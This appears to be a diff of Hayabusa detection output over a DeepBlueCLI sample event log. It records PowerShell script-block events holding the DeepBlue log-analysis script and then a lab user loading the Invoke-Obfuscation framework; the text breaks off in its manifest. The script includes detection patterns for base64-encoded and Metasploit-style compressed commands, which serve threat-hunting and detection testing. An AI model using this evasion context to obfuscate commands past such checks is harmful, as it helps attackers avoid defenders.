+2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.672 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.682 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.684 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:41.504 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:41.506 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:41.507 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:42.511 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:49.242 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:49.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:52.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:12:04.061 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:12:04.069 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:12:09.520 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:13:28.641 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:13:28.657 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:13:31.538 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:21.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:31.954 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:31.956 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:38.671 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:38.711 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:38.715 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:38.716 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:38.776 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 